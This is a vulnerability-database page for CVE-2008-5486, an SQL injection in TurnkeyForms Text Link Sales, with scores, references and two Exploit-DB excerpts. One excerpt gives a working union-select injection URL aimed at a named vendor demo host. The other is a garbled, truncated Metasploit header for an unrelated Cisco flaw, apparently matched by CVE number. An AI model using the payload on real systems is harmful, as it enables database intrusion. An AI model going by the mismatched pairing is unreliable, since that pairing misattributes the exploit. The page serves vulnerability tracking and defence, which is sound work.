CVE-2008-5486
published 2008-12-12
CVE-2008-5486: SQL injection vulnerability in admin.php in TurnkeyForms Text Link Sales allows remote attackers to execute arbitrary SQL commands via the id parameter.
Priority P341 high 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.04% (59.7th percentile)
No detection rules found.
Exploit-DB
Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
exploitdb·2013-12-03
CVE-2013-5486 Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author'
Exploit-DB
TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection
exploitdb·2008-11-14
CVE-2008-5487 TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection
---
[~] turnkeyforms Text Link Sales Remote Sql inj & xss
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 14.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] my bug number now: 43
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------
Exploit: sql inj
http://localhost/script/admin.php?a=users&id=[SQL]
[SQL]
999+union+select+1,user(),database(),version(),5,6,7--
sql for demo:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
xss:
http:/
No writeups or analysis indexed.
http://secunia.com/advisories/32732
http://securityreason.com/securityalert/4719
http://www.securityfocus.com/bid/32308
https://exchange.xforce.ibmcloud.com/vulnerabilities/46631
https://www.exploit-db.com/exploits/7124
2008-12-12
Published